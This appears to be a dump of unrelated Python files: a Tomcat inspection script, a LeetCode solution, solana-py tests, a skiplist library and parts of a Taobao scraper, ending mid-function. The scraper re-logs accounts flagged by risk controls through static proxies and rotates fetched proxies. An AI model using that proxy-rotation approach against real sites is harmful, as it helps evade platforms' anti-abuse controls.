proc_info = get_proc_info(pid=self.tomcat_pid)
proc_jvm = proc_info.get_jvm_info
proc_jvm_list = proc_info.get_jvm_info2list(proc_jvm)
if json_dick['JdkVersion'][:3] == '1.8':
json_dick['jvm_Xms'], json_dick['jvm_Xmx'], json_dick['jvm_Perm'], \
json_dick['jvm_MaxPerm'], json_dick['jvm_Metaspace'], json_dick['jvm_MaxMetaspace'] = proc_info.get_jvm(proc_jvm_list)
else:
json_dick['jvm_Xms'], json_dick['jvm_Xmx'], json_dick['jvm_Perm'], \
json_dick['jvm_MaxPerm'], json_dick['jvm_Metaspace'], json_dick['jvm_MaxMetaspace'] = proc_info.get_jvm(proc_jvm_list)
if proc_info.get_jmx(proc_jvm_list) is None:
json_dick['jmx'] = False
else:
json_dick['jmx'] = proc_info.get_jmx(proc_jvm_list)
json_dick['InstallDir'] = proc_info.get_tomcat_install(proc_jvm_list)
json_dick['startup_location'] = proc_info.get_startup_location(json_dick['InstallDir'])
json_dick['port'] = _init.get_tomcat_port(json_dick['InstallDir'])
db_info = _init.get_tomcat_jndi(json_dick['InstallDir'])
if db_info:
json_dick['jdbc'] = _init.get_tomcat_jndi(json_dick['InstallDir'])
else:
db_info_list = proc_info.get_netstat_db(dbRuslt=False)
if db_info_list:
json_dick['jdbc'] = ','.join(db_info_list)
else:
json_dick['jdbc'] = None
json_dick['mode'], json_dick['maxThreads'], json_dick['minThreads'] = _init.get_tomcat_mode(json_dick['InstallDir'])
json_dick['webapps_files'] = _init.get_tomcat_webapps(json_dick['InstallDir'])
json_dick['version'] = _init.get_tomcat_version(tomcatBaseHome=json_dick['InstallDir'],
username=json_dick['user'])
return json_dick
if __name__ == "__main__":
# 初始化对象,根据命令行命令搜索运行中的Tomcat进程
_init = get_tomcat_info("ps axu|grep java |grep -v grep|grep 'config.file'|grep '\-Dcatalina.home'", appType='Tomcat')
# 获取运行中进程的pid,组装为list
pidlist = _init.pidList
ret_list = []
# 循环获取当前机器上的tomcat进程的pid
for idnu in pidlist:
json_dick = {}
_init_set_param2json = set_param2json(func=_init, tomcat_pid=idnu)
tomcat_base_param = _init_set_param2json.param2json
ret_list.append(tomcat_base_param)
node_dict = json.dumps(ret_list, sort_keys=True, indent=4, separators=(',', ': '), encoding='utf8',
ensure_ascii=True)
print node_dict
``` |
{
"source": "524119574/LeetCodeSolution",
"score": 4
} |
#### File: 524119574/LeetCodeSolution/_1168_OptimizeWaterDistributioninaVillage.py
```python
# Constraints:
# 1 <= n <= 10000
# wells.length == n
# 0 <= wells[i] <= 10^5
# 1 <= pipes.length <= 10000
# 1 <= pipes[i][0], pipes[i][1] <= n
# 0 <= pipes[i][2] <= 10^5
# pipes[i][0] != pipes[i][1]
"""
I didn't have any clue on how to do it when I saw the question for the first
time.
A key realization is to transform the question into a Minimum Spanning Tree
(MST) problem, by considering building a wall as equivalent of connection to
House 0 which has the water.
"""
class Solution(object):
def minCostToSupplyWater(self, n, wells, pipes):
"""
:type n: int
:type wells: List[int]
:type pipes: List[List[int]]
:rtype: int
"""
parents = [i for i in range(n + 1)] # We have added a new House 0.
def find(target):
"""
Note that this find implementation uses path compression, if this
technique wasn't employ the time complexity will gets very large,
i.e. linear.
The naive implementation looks like this:
if (target != parents[target]):
return find(parents[target])
return target
The path compression technique basically set the parent of the
target node to be the ultimate parent instead of the intermediate
parent, which reduces the time when we want to find its parent
again in the future.
A visualized example is the following, coming from Geeks for
Geeks: https://www.geeksforgeeks.org/union-find-algorithm-set-2-union-by-rank/
Let the subset {0, 1, .. 9} be represented as below and find() is
called for element 3.
9
/ | \
4 5 6
/ \ / \
0 3 7 8
/ \
1 2
When find() is called for 3, we traverse up and find 9 as
representative of this subset. With path compression, we also make
3 as the child of 9 so that when find() is called next time for 1,
2 or 3, the path to root is reduced.
9
/ / \ \
4 5 6 3
/ / \ / \
0 7 8 1 2
"""
if (target != parents[target]):
parents[target] = find(parents[target])
return parents[target]
def union(group1, group2):
group1Leader = find(group1)
group2Leader = find(group2)
parents[group1Leader] = group2Leader
newPipes = [(0, i + 1, wells[i]) for i in range(len(wells))]
totalPrice = cnt = 0
for end1, end2, price in sorted(newPipes + pipes, key=lambda p:p[2]):
if (find(end1) != find(end2)):
union(end1, end2)
totalPrice += price
cnt += 1
if (cnt == n):
return totalPrice
``` |
{
"source": "524119574/solana-py",
"score": 2
} |
#### File: solana-py/tests/conftest.py
```python
import pytest
from solana.account import Account
from solana.blockhash import Blockhash
from solana.publickey import PublicKey
@pytest.fixture(scope="session")
def stubbed_blockhash() -> Blockhash:
"""Arbitrary block hash."""
return Blockhash("EETubP5AKHgjPAhzPAFcb8BAY1hMH639CWCFTqi3hq1k")
@pytest.fixture(scope="session")
def stubbed_reciever() -> PublicKey:
"""Arbitrary known public key to be used as reciever."""
return PublicKey("<KEY>")
@pytest.fixture(scope="session")
def stubbed_sender() -> Account:
"""Arbitrary known account to be used as sender."""
return Account(bytes([8] * PublicKey.LENGTH))
```
#### File: tests/unit_tests/test_system_program.py
```python
import solana.system_program as sp
from solana.account import Account
def test_transfer():
"""Test creating a transaction for transfer."""
params = sp.TransferParams(from_pubkey=Account().public_key(), to_pubkey=Account().public_key(), lamports=123)
txn = sp.transfer(params)
assert len(txn.instructions) == 1
assert sp.decode_transfer(txn.instructions[0]) == params
``` |
{
"source": "524243642/badger",
"score": 2
} |
#### File: boost_collections/zskiplist/zset_node.py
```python
class ZsetNode(object):
def __init__(self, ele, score):
super(ZsetNode, self).__init__()
self.ele = ele
self.score = score
```
#### File: boost_collections/zskiplist/zset_obj.py
```python
from sys import maxsize
from boost_collections.zskiplist.constant import ZADD_NX, ZADD_INCR, ZADD_ADDED, ZADD_UPDATED, ZADD_NOP, ZADD_NONE, OK
from boost_collections.zskiplist.exception import NotSupportException
from boost_collections.zskiplist.zset import Zset
from boost_collections.zskiplist.zset_node import ZsetNode
class ZsetObj(object):
def __init__(self):
super(ZsetObj, self).__init__()
self.zset = Zset()
def zrange_generic_by_score(self, reverse, min_, minex, max_, maxex, limit, withscores):
"""
:param reverse:
:param min_:
:param minex:
:param max_:
:param maxex:
:param limit:
:param withscores:
:return:
"""
zsl = self.zset.zsl
rets = zsl.zsl_range_generic_by_score(reverse=reverse, min_=min_, minex=minex, max_=max_, maxex=maxex,
limit=limit)
result = []
for ret in rets:
result.append(ZsetNode(ele=ret[0], score=ret[1] if withscores else None))
return result
def zrange_generic(self, reverse, start, end, withscores):
"""
:param reverse:
:param start:
:param end:
:param withscores:
:return:
"""
assert (-maxsize - 1) <= start <= maxsize
llen = self.zset.zset_length()
if start < 0:
start = llen + start
if end < 0:
end = llen + end
if start < 0:
start = 0
if start > end or start >= llen:
return None
if end >= llen:
end = llen - 1
rangelen = (end - start) + 1
zsl = self.zset.zsl
rets = zsl.zsl_range_generic(reverse=reverse, start=start, rangelen=rangelen)
result = []
for ret in rets:
result.append(ZsetNode(ele=ret[0], score=ret[1] if withscores else None))
return result
# if reverse:
# ln = zsl.tail
# if start > 0:
# ln = zsl.zsl_get_element_by_rank(rank=llen - start)
# else:
# ln = zsl.header.level[0].forward
# if start > 0:
# ln = zsl.zsl_get_element_by_rank(rank=start + 1)
# result = []
# while rangelen > 0:
# assert ln is not None
# node = ZsetNode(ele=ln.ele, score=ln.score if withscores else None)
# result.append(node)
# ln = ln.backward if reverse else ln.level[0].forward
# rangelen -= 1
# return result
def zrange_by_score(self, min_, minex, max_, maxex, limit=-1, withscores=1):
"""
:param min_:
:param minex:
:param max_:
:param maxex:
:param limit:
:param withscores:
:return:
"""
return self.zrange_generic_by_score(reverse=0, min_=min_, minex=minex, max_=max_, maxex=maxex, limit=limit,
withscores=withscores)
def zrevrange_by_score(self, min_, minex, max_, maxex, limit=-1, withscores=1):
"""
:param min_:
:param minex:
:param max_:
:param maxex:
:param limit:
:param withscores:
:return:
"""
return self.zrange_generic_by_score(reverse=1, min_=min_, minex=minex, max_=max_, maxex=maxex, limit=limit,
withscores=withscores)
def zrange(self, start, end, withscores):
"""
:param start:
:param end:
:param withscores:
:return:
"""
return self.zrange_generic(reverse=0, start=start, end=end, withscores=withscores)
def zrevrange(self, start, end, withscores):
"""
:param start:
:param end:
:param withscores:
:return:
"""
return self.zrange_generic(reverse=1, start=start, end=end, withscores=withscores)
def strcasecmp(self, s1, s2):
if s1 is None and s2 is None:
return True
if s1 is None or s2 is None:
return False
if s1.lower() == s2.lower():
return True
return False
def zadd_generic(self, flags, elements, *opts):
"""
:param flags:
:param elements:
:param opts:
:return:
"""
added = 0
updated = 0
processed = 0
assert elements is not None and len(elements) > 0
for opt in opts:
if self.strcasecmp(opt, "nx"):
flags |= ZADD_NX
elif self.strcasecmp(opt, "incr"):
flags |= ZADD_INCR
else:
break
incr = (flags & ZADD_INCR) != 0
if incr and len(elements) > 1:
raise NotSupportException('INCR option supports a single increment-element pair')
for element in elements:
retval, retflags, retscore = self.zset.zset_add(score=element.score, ele=element.ele, flags=flags)
assert retval != 0
if retflags & ZADD_ADDED:
added += 1
if retflags & ZADD_UPDATED:
updated += 1
if not (retflags & ZADD_NOP):
processed += 1
score = retscore
element.score = score
return added + updated
def zadd(self, elements, *opt):
"""
:param elements:
:param opt:
:return:
"""
if not isinstance(elements, list):
elements = [elements]
self.zadd_generic(ZADD_NONE, elements, *opt)
def zincrby(self, elements, *opt):
"""
:param elements:
:param opt:
:return:
"""
if not isinstance(elements, list):
elements = [elements]
self.zadd_generic(ZADD_INCR, elements, *opt)
def zrem(self, *eles):
"""
:param eles:
:return:
"""
deleted = 0
for ele in eles:
retval = self.zset.zset_del(ele=ele)
if retval:
deleted += 1
return deleted
def zcard(self):
"""
:return:
"""
return self.zset.zset_length()
def zscore(self, ele):
"""
:param ele:
:return:
"""
retval, retscore = self.zset.zset_score(member=ele)
if retval == OK:
return retscore
return None
def zfloor(self, score):
"""
:param score:
:return:
"""
ret = self.zset.zset_get_floor_element_by_score(score=score)
if not ret:
return None
return ZsetNode(ele=ret[0], score=ret[1])
def zlower(self, score):
"""
:param score:
:return:
"""
ret = self.zset.zset_get_lower_element_by_score(score=score)
if not ret:
return None
return ZsetNode(ele=ret[0], score=ret[1])
```
#### File: boost_collections/zskiplist/zskiplist_level.py
```python
class ZskiplistLevel(object):
def __init__(self):
super(ZskiplistLevel, self).__init__()
self.forward = None
self.span = None
```
#### File: tests/zskiplist/test_zskiplist_ex.py
```python
import unittest
from boost_collections.zskiplist.zskiplist_ex import ZskiplistEx
class TestZskiplist(unittest.TestCase):
def setUp(self):
self.zsl = ZskiplistEx()
self.zsl.zsl_insert(10, 'a')
self.zsl.zsl_insert(5, 'b')
def test_zsl_length(self):
zsl = self.zsl
length = zsl.zsl_length()
self.assertEqual(2, length)
def test_zsl_insert(self):
zsl = self.zsl
result = self.zsl.zsl_insert(11, 'c')
self.assertEqual(1, result)
self.assertEqual(3, zsl.zsl_length())
def test_zsl_delete(self):
zsl = self.zsl
result = zsl.zsl_delete(5, 'b')
self.assertEqual(1, zsl.zsl_length())
self.assertEqual(1, result)
def test_zsl_range_generic(self):
zsl = self.zsl
self.zsl.zsl_insert(-1, 'c')
result = zsl.zsl_range_generic(0, 0, 1)
self.assertEqual([('c', -1.0)], result)
if __name__ == '__main__':
unittest.main()
```
#### File: tests/zskiplist/test_zskiplist.py
```python
import unittest
from boost_collections.zskiplist.zskiplist import Zskiplist
class TestZskiplist(unittest.TestCase):
def setUp(self):
self.zsl = Zskiplist()
self.zsl.zsl_insert(10, 'a')
self.zsl.zsl_insert(10, 'b')
def test_zsl_insert(self):
zsl = self.zsl
self.zsl.zsl_insert(10, 'c')
self.assertEqual(3, zsl.length)
def test_zsl_delete(self):
zsl = self.zsl
zsl.zsl_delete(10, 'b')
self.assertEqual(1, zsl.length)
retval, node = zsl.zsl_delete(10, 'c')
self.assertEqual(0, retval)
def test_zsl_get_element_by_rank(self):
zsl = self.zsl
zsl.zsl_insert(3, 'c')
ele = zsl.zsl_get_element_by_rank(1)
self.assertIsNotNone(ele)
self.assertEqual('c', ele.ele)
ele = zsl.zsl_get_element_by_rank(4)
self.assertIsNone(ele)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "524243642/taobao_spider",
"score": 3
} |
#### File: taobao_spider/common/column.py
```python
import json
from sqlalchemy import TypeDecorator, Text
from sqlalchemy.dialects.mysql import LONGTEXT
from sqlalchemy.ext.mutable import Mutable
from config.config_loader import logger
class MutableDict(Mutable, dict):
@classmethod
def coerce(cls, key, value):
"""Convert plain dictionaries to MutableDict."""
if not isinstance(value, MutableDict):
if isinstance(value, dict):
return MutableDict(value)
# this call will raise ValueError
return Mutable.coerce(key, value)
else:
return value
def __setitem__(self, key, value):
"""Detect dictionary set events and emit change events."""
dict.__setitem__(self, key, value)
self.changed()
def __delitem__(self, key):
"""Detect dictionary del events and emit change events."""
dict.__delitem__(self, key)
self.changed()
@MutableDict.as_mutable
class JSONEncodedMutableDict(TypeDecorator):
"""Represents an mutable structure as a json-encoded string.
Usage::
JSONEncodedMutableDict(255)
"""
impl = Text
def process_bind_param(self, value, dialect):
if value:
value = json.dumps(value, ensure_ascii=False, indent=2)
else:
value = None
return value
def process_result_value(self, value, dialect):
if value:
value = json.loads(value)
else:
value = {}
return value
class JSONEncodedLongColumn(TypeDecorator):
impl = LONGTEXT
def process_bind_param(self, value, dialect):
try:
value = json.dumps(value, ensure_ascii=False, indent=2)
except BaseException as e:
logger.exception(e)
value = ''
return value
def process_result_value(self, value, dialect):
try:
value = json.loads(value)
except BaseException:
value = {}
return value
class JSONEncodedColumn(TypeDecorator):
impl = Text
def process_bind_param(self, value, dialect):
try:
value = json.dumps(value, ensure_ascii=False, indent=2)
except BaseException as e:
logger.exception(e)
value = ''
return value
def process_result_value(self, value, dialect):
try:
value = json.loads(value)
except BaseException:
value = {}
return value
def bit_column_helper(offset, name='status'):
"""a helper to turn a bit of an integer field to be a flag,
see DeleteBitMixin for an example
@param offset index of the bit, from lower to higher, starts from 0
@param name name of the column
"""
mask = 1 << offset
class BitHelper(object):
def enable(self):
value = getattr(self, name)
value |= mask
setattr(self, name, value)
def disable(self):
value = getattr(self, name)
value &= ~mask
setattr(self, name, value)
def is_enable(self):
value = getattr(self, name)
return bool(value & mask)
@staticmethod
def is_set_criterion():
def _(cls):
column = getattr(cls, name)
return column.op('&')(mask) != 0
return classmethod(_)
def set_value(self, is_enable):
value = getattr(self, name)
if is_enable:
value |= mask
else:
value &= ~mask
setattr(self, name, value)
bit_property = property(is_enable, set_value)
return BitHelper
```
#### File: taobao_spider/common/mongo_.py
```python
import traceback
from contextlib import contextmanager
from pymongo import MongoClient
from config.config_loader import global_profile, logger
mongo_client = MongoClient(global_profile.MONGO_DATABASE_URI)
db = mongo_client.get_database(global_profile.MONGO_DB)
@contextmanager
def mongo_collection_scope(**kwargs):
collection_name = kwargs.get('collection_name')
try:
collection = db.get_collection(name=collection_name)
yield collection
except:
logger.error("failed to finish the mongo commit: %s", traceback.format_exc())
raise
```
#### File: taobao_spider/common/redis_.py
```python
import redis
from config.config_loader import global_profile
redisInfo = {
'host': global_profile.REDIS_HOST,
'password': global_profile.REDIS_PASSWORD,
'port': global_profile.REDIS_PORT,
'db': global_profile.REDIS_DB
}
class PoolingRedisClient(object):
def __init__(self):
if not hasattr(PoolingRedisClient, 'pool'):
PoolingRedisClient.getRedisCoon() # 创建redis连接
# self.connection = redis.Redis(connection_pool=PoolingRedisClient.pool)
@staticmethod
def getRedisCoon():
PoolingRedisClient.pool = redis.ConnectionPool(host=redisInfo['host'], password=redisInfo['password'],
port=redisInfo['port'], db=redisInfo['db'])
redis_pool = PoolingRedisClient()
def get_redis_client():
return redis.Redis(connection_pool=redis_pool.pool)
```
#### File: mall_spider/dao/utils.py
```python
from __future__ import absolute_import, print_function
import copy
from sqlalchemy import desc
from sqlalchemy.orm.attributes import InstrumentedAttribute
from sqlalchemy.schema import Column
from sqlalchemy.sql.expression import ColumnElement
def get_model_pks(model_cls):
rtn = set()
if hasattr(model_cls, '_sa_class_manager'):
class_manager = getattr(model_cls, '_sa_class_manager')
if hasattr(class_manager, 'mapper'):
mapper = getattr(class_manager, 'mapper')
if hasattr(mapper, '_all_pk_props'):
pks = getattr(mapper, '_all_pk_props')
if pks:
for pk in pks:
rtn.add(getattr(pk, 'description'))
else:
for key in model_cls.__dict__:
item = getattr(model_cls, key, None)
if item is not None and isinstance(item, Column) and hasattr(item, 'primary_key') and item.primary_key:
rtn.add(item.name)
return rtn
def get_model_onupdates(model_cls):
rtn = {}
properties = _extract_model_properties(model_cls)
for pro in properties:
column = getattr(model_cls, pro)
try:
onupdate = getattr(column, 'onupdate')
if onupdate is not None:
rtn[pro] = onupdate
except AttributeError:
pass
return rtn
def fill_model(_model, _conditions):
_, conditions = _unpack_conditions(type(_model), _conditions)
properties = _extract_model_properties(type(_model))
fill_properties = list(set(properties).intersection(set(conditions.keys())))
for prop in fill_properties:
value = conditions.get(prop)
if isinstance(value, (list, dict, tuple, set)):
value = copy.deepcopy(value)
setattr(_model, prop, value)
def copy_model_ignore_properties(_model_target, _model_source, *args):
properties = _extract_model_properties(type(_model_target))
for prop in properties:
if args and prop not in args and hasattr(_model_source, prop):
setattr(_model_target, prop, getattr(_model_source, prop))
def copy_model(_model_target, _model_source):
copy_model_ignore_properties(_model_target, _model_source)
def _merge_condition(model_cls, _conditions):
equals_dict = dict()
scope_dict = dict()
in_dict = dict()
format_conditions, _ = _unpack_conditions(model_cls, _conditions)
def set_condition(k, v):
if isinstance(v, (list, set, tuple)):
in_dict[k] = v
else:
equals_dict[k] = v
for prop, value in format_conditions.items():
set_condition(prop, value)
return equals_dict, scope_dict, in_dict
def _unpack_conditions(model_cls, _conditions):
rtn_cond = dict()
key_cond = dict()
for k in _conditions.keys():
if isinstance(k, Column):
key = k.name
prop = getattr(model_cls, key, None)
elif isinstance(k, InstrumentedAttribute):
key = k.key
prop = k
# elif isinstance(k, (str, unicode)):
elif isinstance(k, (str)):
key = k
prop = getattr(model_cls, k, None)
else:
continue
v = _conditions.get(k)
if prop:
rtn_cond[prop] = v
key_cond[key] = v
return rtn_cond, key_cond
def _unpack_entities(model_cls, entities):
rtn = []
for entity in entities:
rtn.append(_unpack_entity(model_cls, entity))
return rtn
def _unpack_entity(model_cls, source):
if isinstance(source, Column) and source.name:
return getattr(model_cls, source.name)
# elif isinstance(source, (str, unicode)):
elif isinstance(source, (str)):
return getattr(model_cls, source)
else:
return source
def _extract_model_properties(model_cls):
if hasattr(model_cls, '_sa_class_manager'):
class_manager = getattr(model_cls, '_sa_class_manager')
if class_manager:
if hasattr(class_manager, '_all_key_set'):
return list(getattr(class_manager, '_all_key_set'))
elif hasattr(class_manager, 'keys'):
return class_manager.keys()
else:
rtn = list()
attr_names = model_cls.__dict__
for attr_name in attr_names:
v = getattr(model_cls, attr_name)
if isinstance(v, InstrumentedAttribute):
rtn.append(attr_name)
return rtn
def _with_entities(model_cls, entities, query):
if not isinstance(entities, (set, list, tuple)):
entities = (entities,)
else:
if len(entities) == 0:
return []
actual_entities = _unpack_entities(model_cls, entities)
if actual_entities:
query = query.with_entities(*actual_entities)
return query
def _filter_equals(query, filter_dict):
for k in filter_dict.keys():
v = filter_dict.get(k)
query = query.filter(k == v)
return query
def _filter_scope(query, item, range_p):
if range_p.begin is not None:
if range_p.begin_equals:
query = query.filter(item >= range_p.begin)
else:
query = query.filter(item > range_p.begin)
if range_p.end is not None:
if range_p.end_equals:
query = query.filter(item <= range_p.end)
else:
query = query.filter(item < range_p.end)
return query
def _filter_in(query, filter_dict):
for k in filter_dict.keys():
v = filter_dict.get(k)
query = query.filter(k.in_(v))
return query
def _order_by(query, model_cls, order_by):
if not isinstance(order_by, (list, tuple)):
order_bys = (order_by,)
else:
order_bys = order_by
for order_by_ in order_bys:
if order_by_ is not None:
# if isinstance(order_by_, (str, unicode)) and order_by_.startswith('-'):
if isinstance(order_by_, (str)) and order_by_.startswith('-'):
query = query.order_by(desc(order_by_[1:]))
else:
order_by_ = _unpack_entity(model_cls, order_by_)
query = query.order_by(order_by_)
return query
def _group_by(query, model_cls, group_by):
if not isinstance(group_by, (list, tuple)):
group_bys = (group_by,)
else:
group_bys = group_by
for group_by_ in group_bys:
if group_by_ is not None:
group_by_ = _unpack_entity(model_cls, group_by_)
query = query.group_by(group_by_)
return query
def _check_param(*args, **kwargs):
for arg in args:
if arg is not None:
return True
for v in kwargs.values():
if v:
return True
return False
class _Query(object):
def __init__(self, model_cls, session):
self._model_cls = model_cls
self._session = session
self._query = self._session.query(model_cls)
self._exception = None
def with_entities(self, entities):
if entities is not None:
self._query = _with_entities(self._model_cls, entities, self._query)
return self
def order_by(self, order_by):
if order_by is not None:
self._query = _order_by(self._query, self._model_cls, order_by)
return self
def group_by(self, group_by):
if group_by is not None:
self._query = _group_by(self._query, self._model_cls, group_by)
return self
def limit(self, limit_):
if limit_ is not None:
self._query = self._query.limit(limit_)
return self
def offset(self, offset_):
if offset_ is not None:
self._query = self._query.offset(offset_)
return self
def filter_by(self, **kwargs):
if kwargs:
equals_dict, scopes_dict, in_dict = _merge_condition(self._model_cls, kwargs)
if equals_dict:
self._query = _filter_equals(self._query, equals_dict)
if in_dict:
self._query = _filter_in(self._query, in_dict)
if scopes_dict:
for k in scopes_dict.keys():
v = scopes_dict.get(k)
self._query = _filter_scope(self._query, k, v)
return self
def filter(self, filters_):
if filters_ is not None:
if isinstance(filters_, (tuple, list, set)):
for filter_ in filters_:
self._query = self._query.filter(filter_)
elif isinstance(filters_, ColumnElement):
self._query = self._query.filter(filters_)
return self
def count(self):
from sqlalchemy import func
pks = get_model_pks(self._model_cls)
entities = []
for pk in pks:
entities.append(getattr(self._model_cls, pk))
return self._query.with_entities(func.count(*entities)).scalar()
def with_for_update(self):
return self._query.with_for_update()
def all(self):
return self._query.all()
def first(self):
return self._query.first()
def exists(self):
return self._query.exists()
def delete(self):
rtn = self._query.all()
self._query.delete(synchronize_session=False)
self._session.expire_all()
return rtn
def scalar(self):
return self._query.scalar()
def make_query(model_cls, _session):
return _Query(model_cls, _session)
```
#### File: mall_spider/job/login_job.py
```python
from common.db import write_session_scope
from config.config_loader import logger, global_config
from mall_spider.dao.stream_risk_dao import get_stream_risk_dao
from mall_spider.job.smorf import Smorf
from mall_spider.model.cmm_sys_stream_risk import CmmSysStreamRisk
from mall_spider.spiders.actions.action_service import ActionService
from mall_spider.spiders.actions.proxy_service import get_proxy_service
class LoginJob(ActionService, Smorf):
def __init__(self, num):
super().__init__()
self.account_num = num
self._proxy_service = get_proxy_service()
def execute(self):
with write_session_scope() as session:
_stream_risk_dao = get_stream_risk_dao(session=session)
rsts = _stream_risk_dao.base_query.limit(self.account_num).all()
if rsts:
for item in rsts:
username = item.raw_data
account = global_config.s_accounts_dict[username]
proxy = self._proxy_service.get_origin_static_proxy(account['username'])
self._login(account=account, force=True, risk=True, proxy=proxy)
_stream_risk_dao.delete(_filter=[CmmSysStreamRisk.id == item.id])
session.commit()
def init(self):
super().init()
def init_argparse(self, parser):
super().init_argparse(parser)
def process(self):
self.execute()
if __name__ == "__main__":
s = LoginJob(1)
logger.info("start to execute login job")
s.process()
logger.error("exit login job")
```
#### File: mall_spider/job/sycm_schedule_job.py
```python
from apscheduler.schedulers.blocking import BlockingScheduler
from config.config_loader import logger
from mall_spider.spiders.actions.action_service import ActionService
class SycmScheduleJob(ActionService, BlockingScheduler):
def __init__(self):
super().__init__()
def handle(self):
# self.execute_sycm_category_job_init_actions()
self.add_job(self.execute_sycm_category_job_init_actions, 'cron', day_of_week='0-6', hour=10, minute=30,
second=0)
def run(self):
self.handle()
self.start()
if __name__ == "__main__":
s = SycmScheduleJob()
logger.info("start to execute sycm_schedule job")
s.run()
# jobs = s.get_jobs()
# print(jobs)
logger.error("exit sycm_schedule job")
```
#### File: mall_spider/model/__init__.py
```python
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
def to_dict(self):
return {c.name: getattr(self, c.name, None) for c in self.__table__.columns}
Base.to_dict = to_dict
```
#### File: spiders/actions/action.py
```python
import traceback
from abc import ABCMeta, abstractmethod
from mall_spider.spiders.actions.executable import Executable
class Action(Executable):
__metaclass__ = ABCMeta
def execute(self, context):
self.on_create(context=context)
self.on_start(context=context)
try:
result = self.do_execute(context=context)
self.on_complete(context=context)
return result
except Exception as e:
import sys
exc_info = sys.exc_info()
self.on_error(context=context, exp=traceback.format_exc())
# raise exc_info[0], exc_info[1], exc_info[2]
raise e
finally:
self.on_destroy(context=context)
@abstractmethod
def do_execute(self, context):
pass
@abstractmethod
def on_create(self, context):
pass
@abstractmethod
def on_start(self, context):
pass
@abstractmethod
def on_error(self, context, exp):
pass
@abstractmethod
def on_complete(self, context):
pass
@abstractmethod
def on_destroy(self, context):
pass
```
#### File: spiders/actions/exception.py
```python
class IllegalArgumentException(Exception):
def __init__(self, *args, **kwargs):
super(IllegalArgumentException, self).__init__(*args, **kwargs)
class RetryException(Exception):
def __init__(self, *args, **kwargs):
super(RetryException, self).__init__(*args, **kwargs)
class NotFoundException(Exception):
def __init__(self, *args, **kwargs):
super(NotFoundException, self).__init__(*args, **kwargs)
class CookieExpiredException(Exception):
def __init__(self, *args, **kwargs):
super(CookieExpiredException, self).__init__(*args, **kwargs)
class ExitException(Exception):
def __init__(self, *args, **kwargs):
super(ExitException, self).__init__(*args, **kwargs)
class CookieNotFoundException(Exception):
def __init__(self, *args, **kwargs):
super(CookieNotFoundException, self).__init__(*args, **kwargs)
class CookieNeedUpdateException(Exception):
def __init__(self, *args, **kwargs):
super(CookieNeedUpdateException, self).__init__(*args, **kwargs)
class StatusCodeException(Exception):
def __init__(self, *args, **kwargs):
super(StatusCodeException, self).__init__(*args, **kwargs)
class InterruptException(Exception):
def __init__(self, *args, **kwargs):
super(InterruptException, self).__init__(*args, **kwargs)
class ProxyException(Exception):
def __init__(self, *args, **kwargs):
super(ProxyException, self).__init__(*args, **kwargs)
```
#### File: spiders/actions/pojo.py
```python
class Good(dict):
meta = {
'flag': '1',
'categoryId': '淘宝品类id',
'categoryName': '淘宝品类name',
'brandId': '淘宝品牌id',
'brandName': '淘宝品牌name',
'modelId': '淘宝型号id',
'modelName': '淘宝型号name',
'priceInfo': [{
'skuId': '淘宝skuId',
'price': '淘宝真实价格'
}],
'sellCount': '淘宝销量',
'date': '2018-10-27'
}
def set_flag(self, flag):
self['flag'] = flag
return self
def get_flag(self):
return self['flag']
def set_category_id(self, category_id):
self['categoryId'] = category_id
return self
def get_category_id(self):
return self['categoryId']
def set_category_name(self, category_name):
self['categoryName'] = category_name
return self
def set_brand_id(self, brand_id):
self['brandId'] = brand_id
return self
def get_brand_id(self):
return self['brandId']
def set_brand_name(self, brand_name):
self['brandName'] = brand_name
return self
def get_brand_name(self):
return self['brandName']
def set_model_id(self, model_id):
self['modelId'] = model_id
return self
def set_model_name(self, model_name):
self['modelName'] = model_name
return self
def get_model_name(self):
return self['modelName']
def get_query(self):
return self['brandName'] + '+' + self['modelName']
def set_price_info(self, price_info):
self['priceInfo'] = price_info
return self
def set_sell_count(self, sell_count):
self['sellCount'] = sell_count
return self
def set_date(self, date):
self['date'] = date
return self
def get_date(self):
return self['date']
def set_sku_base(self, sku_base):
self['skuBase'] = sku_base
return self
def get_sku_base(self):
return self['skuBase']
```
#### File: spiders/actions/proxy_service.py
```python
import time
from config.config_loader import global_config
from mall_spider.spiders.actions.context import Context
from mall_spider.spiders.actions.direct_proxy_action import DirectProxyAction
__proxy_service = None
class ProxyService(object):
proxies_set = set()
proxies_list = ['https://' + item['ip'] + ':' + item['port'] for item in global_config.s_proxy]
LOW_WATER_MARK = 5
proxy_fetch_url = "http://ip.11jsq.com/index.php/api/entry?method=proxyServer.generate_api_url&packid=1&fa=0&fetch_key=&qty=1&time=1&pro=&city=&port=1&format=json&ss=5&css=&dt=1&specialTxt=3&specialJson="
def __init__(self) -> None:
super().__init__()
self._counter = 0
def get_s_proxy(self, username):
proxy = global_config.s_proxy_dict[username]
url = 'https://' + proxy['ip'] + ':' + proxy['port']
return {
'https': url
}
def get_origin_s_proxy(self, username):
return global_config.s_proxy_dict[username]
def get_static_proxy(self, username):
if not global_config.static_proxy:
return None
proxy = global_config.static_proxy_dict[username]
if proxy['username'] and proxy['password']:
url = 'https://' + proxy['username'] + ':' + proxy['password'] + '@' + proxy['ip'] + ':' + proxy['port']
else:
url = 'https://' + proxy['ip'] + ':' + proxy['port']
return {
'https': url
}
def get_origin_static_proxy(self, username):
if not global_config.static_proxy:
return None
return global_config.static_proxy_dict[username]
def get_proxy(self):
if len(self.proxies_list) < self.LOW_WATER_MARK:
for i in range(0, int(self.LOW_WATER_MARK * 1) - len(self.proxies_list)):
self.fetch_proxy()
time.sleep(2)
proxy = self.proxies_list[self._counter % len(self.proxies_list)]
self._counter += 1
return {
'https': proxy
}
def fetch_proxy(self):
context = Context()
action = DirectProxyAction()
action.execute(context=context)
result = context.get(Context.KEY_PROXY_RESULT, [])
if result:
for item in result:
ip = item['IP']
port = str(item['Port'])
url = 'https://' + ip + ':' + port
if url not in self.proxies_set:
self.proxies_set.add(url)
self.proxies_list.append(url)
def remove_proxy(self, url, force=False):
if force:
self.proxies_set.remove(url)
self.proxies_list.remove(url)
def get_proxy_service():
global __proxy_service
if not __proxy_service:
__proxy_service = ProxyService()
return __proxy_service
```
#### File: spiders/actions/taobao_sale_list_page_action_bak.py
```python
from mall_spider.spiders.actions.context import Context
from mall_spider.spiders.actions.http_action import HttpAction
class TaobaoSaleListPageAction(HttpAction):
def do_execute(self, context):
"""
:param context:
:return:
"""
http_request = context.get(Context.KEY_TAOBAO_SALE_LIST_HTTP_REQUEST)
response = self.execute_in_retry(context=context, http_request=http_request)
